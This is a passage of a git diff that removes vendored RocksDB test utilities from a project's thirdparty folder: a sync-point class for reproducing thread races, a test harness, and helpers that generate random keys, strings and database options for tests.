-  successors_.clear();
-  predecessors_.clear();
-  cleared_points_.clear();
-  markers_.clear();
-  marked_thread_id_.clear();
-  for (const auto& dependency : dependencies) {
-    successors_[dependency.predecessor].push_back(dependency.successor);
-    predecessors_[dependency.successor].push_back(dependency.predecessor);
-  }
-  for (const auto& marker : markers) {
-    successors_[marker.predecessor].push_back(marker.successor);
-    predecessors_[marker.successor].push_back(marker.predecessor);
-    markers_[marker.predecessor].push_back(marker.successor);
-  }
-  cv_.notify_all();
-}
-
-bool SyncPoint::PredecessorsAllCleared(const std::string& point) {
-  for (const auto& pred : predecessors_[point]) {
-    if (cleared_points_.count(pred) == 0) {
-      return false;
-    }
-  }
-  return true;
-}
-
-void SyncPoint::SetCallBack(const std::string point,
-                            std::function<void(void*)> callback) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  callbacks_[point] = callback;
-}
-
-void SyncPoint::ClearCallBack(const std::string point) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  while (num_callbacks_running_ > 0) {
-    cv_.wait(lock);
-  }
-  callbacks_.erase(point);
-}
-
-void SyncPoint::ClearAllCallBacks() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  while (num_callbacks_running_ > 0) {
-    cv_.wait(lock);
-  }
-  callbacks_.clear();
-}
-
-void SyncPoint::EnableProcessing() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  enabled_ = true;
-}
-
-void SyncPoint::DisableProcessing() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  enabled_ = false;
-}
-
-void SyncPoint::ClearTrace() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  cleared_points_.clear();
-}
-
-bool SyncPoint::DisabledByMarker(const std::string& point,
-                                 std::thread::id thread_id) {
-  auto marked_point_iter = marked_thread_id_.find(point);
-  return marked_point_iter != marked_thread_id_.end() &&
-         thread_id != marked_point_iter->second;
-}
-
-void SyncPoint::Process(const std::string& point, void* cb_arg) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  if (!enabled_) {
-    return;
-  }
-
-  auto thread_id = std::this_thread::get_id();
-
-  auto marker_iter = markers_.find(point);
-  if (marker_iter != markers_.end()) {
-    for (auto marked_point : marker_iter->second) {
-      marked_thread_id_.insert(std::make_pair(marked_point, thread_id));
-    }
-  }
-
-  if (DisabledByMarker(point, thread_id)) {
-    return;
-  }
-
-  while (!PredecessorsAllCleared(point)) {
-    cv_.wait(lock);
-    if (DisabledByMarker(point, thread_id)) {
-      return;
-    }
-  }
-
-  auto callback_pair = callbacks_.find(point);
-  if (callback_pair != callbacks_.end()) {
-    num_callbacks_running_++;
-    mutex_.unlock();
-    callback_pair->second(cb_arg);
-    mutex_.lock();
-    num_callbacks_running_--;
-    cv_.notify_all();
-  }
-
-  cleared_points_.insert(point);
-  cv_.notify_all();
-}
-}  // namespace rocksdb
-#endif  // NDEBUG
diff --git a/thirdparty/rocksdb/util/sync_point.h b/thirdparty/rocksdb/util/sync_point.h
deleted file mode 100644
index ada61be..0000000
--- a/thirdparty/rocksdb/util/sync_point.h
+++ /dev/null
@@ -1,140 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <assert.h>
-#include <condition_variable>
-#include <functional>
-#include <mutex>
-#include <string>
-#include <thread>
-#include <unordered_map>
-#include <unordered_set>
-#include <vector>
-
-// This is only set from db_stress.cc and for testing only.
-// If non-zero, kill at various points in source code with probability 1/this
-extern int rocksdb_kill_odds;
-// If kill point has a prefix on this list, will skip killing.
-extern std::vector<std::string> rocksdb_kill_prefix_blacklist;
-
-#ifdef NDEBUG
-// empty in release build
-#define TEST_KILL_RANDOM(kill_point, rocksdb_kill_odds)
-#else
-
-namespace rocksdb {
-// Kill the process with probablity 1/odds for testing.
-extern void TestKillRandom(std::string kill_point, int odds,
-                           const std::string& srcfile, int srcline);
-
-// To avoid crashing always at some frequently executed codepaths (during
-// kill random test), use this factor to reduce odds
-#define REDUCE_ODDS 2
-#define REDUCE_ODDS2 4
-
-#define TEST_KILL_RANDOM(kill_point, rocksdb_kill_odds)                  \
-  {                                                                      \
-    if (rocksdb_kill_odds > 0) {                                         \
-      TestKillRandom(kill_point, rocksdb_kill_odds, __FILE__, __LINE__); \
-    }                                                                    \
-  }
-}  // namespace rocksdb
-#endif
-
-#ifdef NDEBUG
-#define TEST_SYNC_POINT(x)
-#define TEST_SYNC_POINT_CALLBACK(x, y)
-#else
-
-namespace rocksdb {
-
-// This class provides facility to reproduce race conditions deterministically
-// in unit tests.
-// Developer could specify sync points in the codebase via TEST_SYNC_POINT.
-// Each sync point represents a position in the execution stream of a thread.
-// In the unit test, 'Happens After' relationship among sync points could be
-// setup via SyncPoint::LoadDependency, to reproduce a desired interleave of
-// threads execution.
-// Refer to (DBTest,TransactionLogIteratorRace), for an example use case.
-
-class SyncPoint {
- public:
-  static SyncPoint* GetInstance();
-
-  struct SyncPointPair {
-    std::string predecessor;
-    std::string successor;
-  };
-
-  // call once at the beginning of a test to setup the dependency between
-  // sync points
-  void LoadDependency(const std::vector<SyncPointPair>& dependencies);
-
-  // call once at the beginning of a test to setup the dependency between
-  // sync points and setup markers indicating the successor is only enabled
-  // when it is processed on the same thread as the predecessor.
-  // When adding a marker, it implicitly adds a dependency for the marker pair.
-  void LoadDependencyAndMarkers(const std::vector<SyncPointPair>& dependencies,
-                                const std::vector<SyncPointPair>& markers);
-
-  // Set up a call back function in sync point.
-  void SetCallBack(const std::string point,
-                   std::function<void(void*)> callback);
-
-  // Clear callback function by point
-  void ClearCallBack(const std::string point);
-
-  // Clear all call back functions.
-  void ClearAllCallBacks();
-
-  // enable sync point processing (disabled on startup)
-  void EnableProcessing();
-
-  // disable sync point processing
-  void DisableProcessing();
-
-  // remove the execution trace of all sync points
-  void ClearTrace();
-
-  // triggered by TEST_SYNC_POINT, blocking execution until all predecessors
-  // are executed.
-  // And/or call registered callback functionn, with argument `cb_arg`
-  void Process(const std::string& point, void* cb_arg = nullptr);
-
-  // TODO: it might be useful to provide a function that blocks until all
-  // sync points are cleared.
-
- private:
-  bool PredecessorsAllCleared(const std::string& point);
-  bool DisabledByMarker(const std::string& point, std::thread::id thread_id);
-
-  // successor/predecessor map loaded from LoadDependency
-  std::unordered_map<std::string, std::vector<std::string>> successors_;
-  std::unordered_map<std::string, std::vector<std::string>> predecessors_;
-  std::unordered_map<std::string, std::function<void(void*)> > callbacks_;
-  std::unordered_map<std::string, std::vector<std::string> > markers_;
-  std::unordered_map<std::string, std::thread::id> marked_thread_id_;
-
-  std::mutex mutex_;
-  std::condition_variable cv_;
-  // sync points that have been passed through
-  std::unordered_set<std::string> cleared_points_;
-  bool enabled_ = false;
-  int num_callbacks_running_ = 0;
-};
-
-}  // namespace rocksdb
-
-// Use TEST_SYNC_POINT to specify sync points inside code base.
-// Sync points can have happens-after depedency on other sync points,
-// configured at runtime via SyncPoint::LoadDependency. This could be
-// utilized to re-produce race conditions between threads.
-// See TransactionLogIteratorRace in db_test.cc for an example use case.
-// TEST_SYNC_POINT is no op in release build.
-#define TEST_SYNC_POINT(x) rocksdb::SyncPoint::GetInstance()->Process(x)
-#define TEST_SYNC_POINT_CALLBACK(x, y) \
-  rocksdb::SyncPoint::GetInstance()->Process(x, y)
-#endif  // NDEBUG
diff --git a/thirdparty/rocksdb/util/testharness.cc b/thirdparty/rocksdb/util/testharness.cc
deleted file mode 100644
index 4626ea0..0000000
--- a/thirdparty/rocksdb/util/testharness.cc
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/testharness.h"
-#include <string>
-
-namespace rocksdb {
-namespace test {
-
-
-std::string TmpDir(Env* env) {
-  std::string dir;
-  Status s = env->GetTestDirectory(&dir);
-  EXPECT_TRUE(s.ok()) << s.ToString();
-  return dir;
-}
-
-int RandomSeed() {
-  const char* env = getenv("TEST_RANDOM_SEED");
-  int result = (env != nullptr ? atoi(env) : 301);
-  if (result <= 0) {
-    result = 301;
-  }
-  return result;
-}
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/testharness.h b/thirdparty/rocksdb/util/testharness.h
deleted file mode 100644
index 44ee76e..0000000
--- a/thirdparty/rocksdb/util/testharness.h
+++ /dev/null
@@ -1,27 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-namespace test {
-
-// Return the directory to use for temporary storage.
-std::string TmpDir(Env* env = Env::Default());
-
-// Return a randomization seed for this run.  Typically returns the
-// same number on repeated invocations of this binary, but automated
-// runs may be able to vary the seed.
-int RandomSeed();
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/testutil.cc b/thirdparty/rocksdb/util/testutil.cc
deleted file mode 100644
index f3010f3..0000000
--- a/thirdparty/rocksdb/util/testutil.cc
+++ /dev/null
@@ -1,401 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/testutil.h"
-
-#include <cctype>
-#include <sstream>
-
-#include "db/memtable_list.h"
-#include "port/port.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace test {
-
-Slice RandomString(Random* rnd, int len, std::string* dst) {
-  dst->resize(len);
-  for (int i = 0; i < len; i++) {
-    (*dst)[i] = static_cast<char>(' ' + rnd->Uniform(95));   // ' ' .. '~'
-  }
-  return Slice(*dst);
-}
-
-extern std::string RandomHumanReadableString(Random* rnd, int len) {
-  std::string ret;
-  ret.resize(len);
-  for (int i = 0; i < len; ++i) {
-    ret[i] = static_cast<char>('a' + rnd->Uniform(26));
-  }
-  return ret;
-}
-
-std::string RandomKey(Random* rnd, int len, RandomKeyType type) {
-  // Make sure to generate a wide variety of characters so we
-  // test the boundary conditions for short-key optimizations.
-  static const char kTestChars[] = {
-    '\0', '\1', 'a', 'b', 'c', 'd', 'e', '\xfd', '\xfe', '\xff'
-  };
-  std::string result;
-  for (int i = 0; i < len; i++) {
-    std::size_t indx = 0;
-    switch (type) {
-      case RandomKeyType::RANDOM:
-        indx = rnd->Uniform(sizeof(kTestChars));
-        break;
-      case RandomKeyType::LARGEST:
-        indx = sizeof(kTestChars) - 1;
-        break;
-      case RandomKeyType::MIDDLE:
-        indx = sizeof(kTestChars) / 2;
-        break;
-      case RandomKeyType::SMALLEST:
-        indx = 0;
-        break;
-    }
-    result += kTestChars[indx];
-  }
-  return result;
-}
-
-
-extern Slice CompressibleString(Random* rnd, double compressed_fraction,
-                                int len, std::string* dst) {
-  int raw = static_cast<int>(len * compressed_fraction);
-  if (raw < 1) raw = 1;
-  std::string raw_data;
-  RandomString(rnd, raw, &raw_data);
-
-  // Duplicate the random data until we have filled "len" bytes
-  dst->clear();
-  while (dst->size() < (unsigned int)len) {
-    dst->append(raw_data);
-  }
-  dst->resize(len);
-  return Slice(*dst);
-}
-
-namespace {
-class Uint64ComparatorImpl : public Comparator {
- public:
-  Uint64ComparatorImpl() { }
-
-  virtual const char* Name() const override {
-    return "rocksdb.Uint64Comparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    assert(a.size() == sizeof(uint64_t) && b.size() == sizeof(uint64_t));
-    const uint64_t* left = reinterpret_cast<const uint64_t*>(a.data());
-    const uint64_t* right = reinterpret_cast<const uint64_t*>(b.data());
-    uint64_t leftValue;
-    uint64_t rightValue;
-    GetUnaligned(left, &leftValue);
-    GetUnaligned(right, &rightValue);
-    if (leftValue == rightValue) {
-      return 0;
-    } else if (leftValue < rightValue) {
-      return -1;
-    } else {
-      return 1;
-    }
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-      const Slice& limit) const override {
-    return;
-  }
-
-  virtual void FindShortSuccessor(std::string* key) const override {
-    return;
-  }
-};
-}  // namespace
-
-static port::OnceType once;
-static const Comparator* uint64comp;
-
-static void InitModule() {
-  uint64comp = new Uint64ComparatorImpl;
-}
-
-const Comparator* Uint64Comparator() {
-  port::InitOnce(&once, InitModule);
-  return uint64comp;
-}
-
-WritableFileWriter* GetWritableFileWriter(WritableFile* wf) {
-  unique_ptr<WritableFile> file(wf);
-  return new WritableFileWriter(std::move(file), EnvOptions());
-}
-
-RandomAccessFileReader* GetRandomAccessFileReader(RandomAccessFile* raf) {
-  unique_ptr<RandomAccessFile> file(raf);
-  return new RandomAccessFileReader(std::move(file),
-                                    "[test RandomAccessFileReader]");
-}
-
-SequentialFileReader* GetSequentialFileReader(SequentialFile* se) {
-  unique_ptr<SequentialFile> file(se);
-  return new SequentialFileReader(std::move(file));
-}
-
-void CorruptKeyType(InternalKey* ikey) {
-  std::string keystr = ikey->Encode().ToString();
-  keystr[keystr.size() - 8] = kTypeLogData;
-  ikey->DecodeFrom(Slice(keystr.data(), keystr.size()));
-}
-
-std::string KeyStr(const std::string& user_key, const SequenceNumber& seq,
-                   const ValueType& t, bool corrupt) {
-  InternalKey k(user_key, seq, t);
-  if (corrupt) {
-    CorruptKeyType(&k);
-  }
-  return k.Encode().ToString();
-}
-
-std::string RandomName(Random* rnd, const size_t len) {
-  std::stringstream ss;
-  for (size_t i = 0; i < len; ++i) {
-    ss << static_cast<char>(rnd->Uniform(26) + 'a');
-  }
-  return ss.str();
-}
-
-CompressionType RandomCompressionType(Random* rnd) {
-  return static_cast<CompressionType>(rnd->Uniform(6));
-}
-
-void RandomCompressionTypeVector(const size_t count,
-                                 std::vector<CompressionType>* types,
-                                 Random* rnd) {
-  types->clear();
-  for (size_t i = 0; i < count; ++i) {
-    types->emplace_back(RandomCompressionType(rnd));
-  }
-}
-
-const SliceTransform* RandomSliceTransform(Random* rnd, int pre_defined) {
-  int random_num = pre_defined >= 0 ? pre_defined : rnd->Uniform(4);
-  switch (random_num) {
-    case 0:
-      return NewFixedPrefixTransform(rnd->Uniform(20) + 1);
-    case 1:
-      return NewCappedPrefixTransform(rnd->Uniform(20) + 1);
-    case 2:
-      return NewNoopTransform();
-    default:
-      return nullptr;
-  }
-}
-
-BlockBasedTableOptions RandomBlockBasedTableOptions(Random* rnd) {
-  BlockBasedTableOptions opt;
-  opt.cache_index_and_filter_blocks = rnd->Uniform(2);
-  opt.pin_l0_filter_and_index_blocks_in_cache = rnd->Uniform(2);
-  opt.index_type = rnd->Uniform(2) ? BlockBasedTableOptions::kBinarySearch
-                                   : BlockBasedTableOptions::kHashSearch;
-  opt.hash_index_allow_collision = rnd->Uniform(2);
-  opt.checksum = static_cast<ChecksumType>(rnd->Uniform(3));
-  opt.block_size = rnd->Uniform(10000000);
-  opt.block_size_deviation = rnd->Uniform(100);
-  opt.block_restart_interval = rnd->Uniform(100);
-  opt.index_block_restart_interval = rnd->Uniform(100);
-  opt.whole_key_filtering = rnd->Uniform(2);
-
-  return opt;
-}
-
-TableFactory* RandomTableFactory(Random* rnd, int pre_defined) {
-#ifndef ROCKSDB_LITE
-  int random_num = pre_defined >= 0 ? pre_defined : rnd->Uniform(4);
-  switch (random_num) {
-    case 0:
-      return NewPlainTableFactory();
-    case 1:
-      return NewCuckooTableFactory();
-    default:
-      return NewBlockBasedTableFactory();
-  }
-#else
-  return NewBlockBasedTableFactory();
-#endif  // !ROCKSDB_LITE
-}
-
-MergeOperator* RandomMergeOperator(Random* rnd) {
-  return new ChanglingMergeOperator(RandomName(rnd, 10));
-}
-
-CompactionFilter* RandomCompactionFilter(Random* rnd) {
-  return new ChanglingCompactionFilter(RandomName(rnd, 10));
-}
-
-CompactionFilterFactory* RandomCompactionFilterFactory(Random* rnd) {
-  return new ChanglingCompactionFilterFactory(RandomName(rnd, 10));
-}
-
-void RandomInitDBOptions(DBOptions* db_opt, Random* rnd) {
-  // boolean options
-  db_opt->advise_random_on_open = rnd->Uniform(2);
-  db_opt->allow_mmap_reads = rnd->Uniform(2);
-  db_opt->allow_mmap_writes = rnd->Uniform(2);
-  db_opt->use_direct_reads = rnd->Uniform(2);
-  db_opt->use_direct_io_for_flush_and_compaction = rnd->Uniform(2);
-  db_opt->create_if_missing = rnd->Uniform(2);
-  db_opt->create_missing_column_families = rnd->Uniform(2);
-  db_opt->enable_thread_tracking = rnd->Uniform(2);
-  db_opt->error_if_exists = rnd->Uniform(2);
-  db_opt->is_fd_close_on_exec = rnd->Uniform(2);
-  db_opt->paranoid_checks = rnd->Uniform(2);
-  db_opt->skip_log_error_on_recovery = rnd->Uniform(2);
-  db_opt->skip_stats_update_on_db_open = rnd->Uniform(2);
-  db_opt->use_adaptive_mutex = rnd->Uniform(2);
-  db_opt->use_fsync = rnd->Uniform(2);
-  db_opt->recycle_log_file_num = rnd->Uniform(2);
-  db_opt->avoid_flush_during_recovery = rnd->Uniform(2);
-  db_opt->avoid_flush_during_shutdown = rnd->Uniform(2);
-
-  // int options
-  db_opt->max_background_compactions = rnd->Uniform(100);
-  db_opt->max_background_flushes = rnd->Uniform(100);
-  db_opt->max_file_opening_threads = rnd->Uniform(100);
-  db_opt->max_open_files = rnd->Uniform(100);
-  db_opt->table_cache_numshardbits = rnd->Uniform(100);
-
-  // size_t options
-  db_opt->db_write_buffer_size = rnd->Uniform(10000);
-  db_opt->keep_log_file_num = rnd->Uniform(10000);
-  db_opt->log_file_time_to_roll = rnd->Uniform(10000);
-  db_opt->manifest_preallocation_size = rnd->Uniform(10000);
-  db_opt->max_log_file_size = rnd->Uniform(10000);
-
-  // std::string options
-  db_opt->db_log_dir = "path/to/db_log_dir";
-  db_opt->wal_dir = "path/to/wal_dir";
-
-  // uint32_t options
-  db_opt->max_subcompactions = rnd->Uniform(100000);
-
-  // uint64_t options
-  static const uint64_t uint_max = static_cast<uint64_t>(UINT_MAX);
-  db_opt->WAL_size_limit_MB = uint_max + rnd->Uniform(100000);
-  db_opt->WAL_ttl_seconds = uint_max + rnd->Uniform(100000);
-  db_opt->bytes_per_sync = uint_max + rnd->Uniform(100000);
-  db_opt->delayed_write_rate = uint_max + rnd->Uniform(100000);
-  db_opt->delete_obsolete_files_period_micros = uint_max + rnd->Uniform(100000);
-  db_opt->max_manifest_file_size = uint_max + rnd->Uniform(100000);
-  db_opt->max_total_wal_size = uint_max + rnd->Uniform(100000);
-  db_opt->wal_bytes_per_sync = uint_max + rnd->Uniform(100000);
-
-  // unsigned int options
-  db_opt->stats_dump_period_sec = rnd->Uniform(100000);
-}
-
-void RandomInitCFOptions(ColumnFamilyOptions* cf_opt, Random* rnd) {
-  cf_opt->compaction_style = (CompactionStyle)(rnd->Uniform(4));
-
-  // boolean options
-  cf_opt->report_bg_io_stats = rnd->Uniform(2);
-  cf_opt->disable_auto_compactions = rnd->Uniform(2);
-  cf_opt->inplace_update_support = rnd->Uniform(2);
-  cf_opt->level_compaction_dynamic_level_bytes = rnd->Uniform(2);
-  cf_opt->optimize_filters_for_hits = rnd->Uniform(2);
-  cf_opt->paranoid_file_checks = rnd->Uniform(2);
-  cf_opt->purge_redundant_kvs_while_flush = rnd->Uniform(2);
-  cf_opt->force_consistency_checks = rnd->Uniform(2);
-
-  // double options
-  cf_opt->hard_rate_limit = static_cast<double>(rnd->Uniform(10000)) / 13;
-  cf_opt->soft_rate_limit = static_cast<double>(rnd->Uniform(10000)) / 13;
-  cf_opt->memtable_prefix_bloom_size_ratio =
-      static_cast<double>(rnd->Uniform(10000)) / 20000.0;
-
-  // int options
-  cf_opt->level0_file_num_compaction_trigger = rnd->Uniform(100);
-  cf_opt->level0_slowdown_writes_trigger = rnd->Uniform(100);
-  cf_opt->level0_stop_writes_trigger = rnd->Uniform(100);
-  cf_opt->max_bytes_for_level_multiplier = rnd->Uniform(100);
-  cf_opt->max_mem_compaction_level = rnd->Uniform(100);
-  cf_opt->max_write_buffer_number = rnd->Uniform(100);
-  cf_opt->max_write_buffer_number_to_maintain = rnd->Uniform(100);
-  cf_opt->min_write_buffer_number_to_merge = rnd->Uniform(100);
-  cf_opt->num_levels = rnd->Uniform(100);
-  cf_opt->target_file_size_multiplier = rnd->Uniform(100);
-
-  // vector int options
-  cf_opt->max_bytes_for_level_multiplier_additional.resize(cf_opt->num_levels);
-  for (int i = 0; i < cf_opt->num_levels; i++) {
-    cf_opt->max_bytes_for_level_multiplier_additional[i] = rnd->Uniform(100);
-  }
-
-  // size_t options
-  cf_opt->arena_block_size = rnd->Uniform(10000);
-  cf_opt->inplace_update_num_locks = rnd->Uniform(10000);
-  cf_opt->max_successive_merges = rnd->Uniform(10000);
-  cf_opt->memtable_huge_page_size = rnd->Uniform(10000);
-  cf_opt->write_buffer_size = rnd->Uniform(10000);
-
-  // uint32_t options
-  cf_opt->bloom_locality = rnd->Uniform(10000);
-  cf_opt->max_bytes_for_level_base = rnd->Uniform(10000);
-
-  // uint64_t options
-  static const uint64_t uint_max = static_cast<uint64_t>(UINT_MAX);
-  cf_opt->max_sequential_skip_in_iterations = uint_max + rnd->Uniform(10000);
-  cf_opt->target_file_size_base = uint_max + rnd->Uniform(10000);
-  cf_opt->max_compaction_bytes =
-      cf_opt->target_file_size_base * rnd->Uniform(100);
-
-  // unsigned int options
-  cf_opt->rate_limit_delay_max_milliseconds = rnd->Uniform(10000);
-
-  // pointer typed options
-  cf_opt->prefix_extractor.reset(RandomSliceTransform(rnd));
-  cf_opt->table_factory.reset(RandomTableFactory(rnd));
-  cf_opt->merge_operator.reset(RandomMergeOperator(rnd));
-  if (cf_opt->compaction_filter) {
-    delete cf_opt->compaction_filter;
-  }
-  cf_opt->compaction_filter = RandomCompactionFilter(rnd);
-  cf_opt->compaction_filter_factory.reset(RandomCompactionFilterFactory(rnd));
-
-  // custom typed options
-  cf_opt->compression = RandomCompressionType(rnd);
-  RandomCompressionTypeVector(cf_opt->num_levels,
-                              &cf_opt->compression_per_level, rnd);
-}
-
-Status DestroyDir(Env* env, const std::string& dir) {
-  Status s;
-  if (env->FileExists(dir).IsNotFound()) {
-    return s;
-  }
-  std::vector<std::string> files_in_dir;
-  s = env->GetChildren(dir, &files_in_dir);
-  if (s.ok()) {
-    for (auto& file_in_dir : files_in_dir) {
-      if (file_in_dir == "." || file_in_dir == "..") {
-        continue;
-      }
-      s = env->DeleteFile(dir + "/" + file_in_dir);
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-
-  if (s.ok()) {
-    s = env->DeleteDir(dir);
-  }
-  return s;
-}
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/testutil.h b/thirdparty/rocksdb/util/testutil.h
deleted file mode 100644
index 02bfb0f..0000000
--- a/thirdparty/rocksdb/util/testutil.h
+++ /dev/null
@@ -1,744 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <algorithm>
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/internal_iterator.h"
-#include "table/plain_table_factory.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-
-namespace rocksdb {
-class SequentialFile;
-class SequentialFileReader;
-
-namespace test {
-
-// Store in *dst a random string of length "len" and return a Slice that
-// references the generated data.
-extern Slice RandomString(Random* rnd, int len, std::string* dst);
-
-extern std::string RandomHumanReadableString(Random* rnd, int len);
-
-// Return a random key with the specified length that may contain interesting
-// characters (e.g. \x00, \xff, etc.).
-enum RandomKeyType : char { RANDOM, LARGEST, SMALLEST, MIDDLE };
-extern std::string RandomKey(Random* rnd, int len,
-                             RandomKeyType type = RandomKeyType::RANDOM);
-
-// Store in *dst a string of length "len" that will compress to
-// "N*compressed_fraction" bytes and return a Slice that references
-// the generated data.
-extern Slice CompressibleString(Random* rnd, double compressed_fraction,
-                                int len, std::string* dst);
-
-// A wrapper that allows injection of errors.
-class ErrorEnv : public EnvWrapper {
- public:
-  bool writable_file_error_;
-  int num_writable_file_errors_;
-
-  ErrorEnv() : EnvWrapper(Env::Default()),
-               writable_file_error_(false),
-               num_writable_file_errors_(0) { }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& soptions) override {
-    result->reset();
-    if (writable_file_error_) {
-      ++num_writable_file_errors_;
-      return Status::IOError(fname, "fake error");
-    }
-    return target()->NewWritableFile(fname, result, soptions);
-  }
-};
-
-// An internal comparator that just forward comparing results from the
-// user comparator in it. Can be used to test entities that have no dependency
-// on internal key structure but consumes InternalKeyComparator, like
-// BlockBasedTable.
-class PlainInternalKeyComparator : public InternalKeyComparator {
- public:
-  explicit PlainInternalKeyComparator(const Comparator* c)
-      : InternalKeyComparator(c) {}
-
-  virtual ~PlainInternalKeyComparator() {}
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return user_comparator()->Compare(a, b);
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {
-    user_comparator()->FindShortestSeparator(start, limit);
-  }
-  virtual void FindShortSuccessor(std::string* key) const override {
-    user_comparator()->FindShortSuccessor(key);
-  }
-};
-
-// A test comparator which compare two strings in this way:
-// (1) first compare prefix of 8 bytes in alphabet order,
-// (2) if two strings share the same prefix, sort the other part of the string
-//     in the reverse alphabet order.
-// This helps simulate the case of compounded key of [entity][timestamp] and
-// latest timestamp first.
-class SimpleSuffixReverseComparator : public Comparator {
- public:
-  SimpleSuffixReverseComparator() {}
-
-  virtual const char* Name() const override {
-    return "SimpleSuffixReverseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    Slice prefix_a = Slice(a.data(), 8);
-    Slice prefix_b = Slice(b.data(), 8);
-    int prefix_comp = prefix_a.compare(prefix_b);
-    if (prefix_comp != 0) {
-      return prefix_comp;
-    } else {
-      Slice suffix_a = Slice(a.data() + 8, a.size() - 8);
-      Slice suffix_b = Slice(b.data() + 8, b.size() - 8);
-      return -(suffix_a.compare(suffix_b));
-    }
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-// Returns a user key comparator that can be used for comparing two uint64_t
-// slices. Instead of comparing slices byte-wise, it compares all the 8 bytes
-// at once. Assumes same endian-ness is used though the database's lifetime.
-// Symantics of comparison would differ from Bytewise comparator in little
-// endian machines.
-extern const Comparator* Uint64Comparator();
-
-// Iterator over a vector of keys/values
-class VectorIterator : public InternalIterator {
- public:
-  explicit VectorIterator(const std::vector<std::string>& keys)
-      : keys_(keys), current_(keys.size()) {
-    std::sort(keys_.begin(), keys_.end());
-    values_.resize(keys.size());
-  }
-
-  VectorIterator(const std::vector<std::string>& keys,
-      const std::vector<std::string>& values)
-    : keys_(keys), values_(values), current_(keys.size()) {
-    assert(keys_.size() == values_.size());
-  }
-
-  virtual bool Valid() const override { return current_ < keys_.size(); }
-
-  virtual void SeekToFirst() override { current_ = 0; }
-  virtual void SeekToLast() override { current_ = keys_.size() - 1; }
-
-  virtual void Seek(const Slice& target) override {
-    current_ = std::lower_bound(keys_.begin(), keys_.end(), target.ToString()) -
-               keys_.begin();
-  }
-
-  virtual void SeekForPrev(const Slice& target) override {
-    current_ = std::upper_bound(keys_.begin(), keys_.end(), target.ToString()) -
-               keys_.begin();
-    if (!Valid()) {
-      SeekToLast();
-    } else {
-      Prev();
-    }
-  }
-
-  virtual void Next() override { current_++; }
-  virtual void Prev() override { current_--; }
-
-  virtual Slice key() const override { return Slice(keys_[current_]); }
-  virtual Slice value() const override { return Slice(values_[current_]); }
-
-  virtual Status status() const override { return Status::OK(); }
-
- private:
-  std::vector<std::string> keys_;
-  std::vector<std::string> values_;
-  size_t current_;
-};
-extern WritableFileWriter* GetWritableFileWriter(WritableFile* wf);
-
-extern RandomAccessFileReader* GetRandomAccessFileReader(RandomAccessFile* raf);
-
-extern SequentialFileReader* GetSequentialFileReader(SequentialFile* se);
-
-class StringSink: public WritableFile {
- public:
-  std::string contents_;
-
-  explicit StringSink(Slice* reader_contents = nullptr) :
-      WritableFile(),
-      contents_(""),
-      reader_contents_(reader_contents),
-      last_flush_(0) {
-    if (reader_contents_ != nullptr) {
-      *reader_contents_ = Slice(contents_.data(), 0);
-    }
-  }
-
-  const std::string& contents() const { return contents_; }
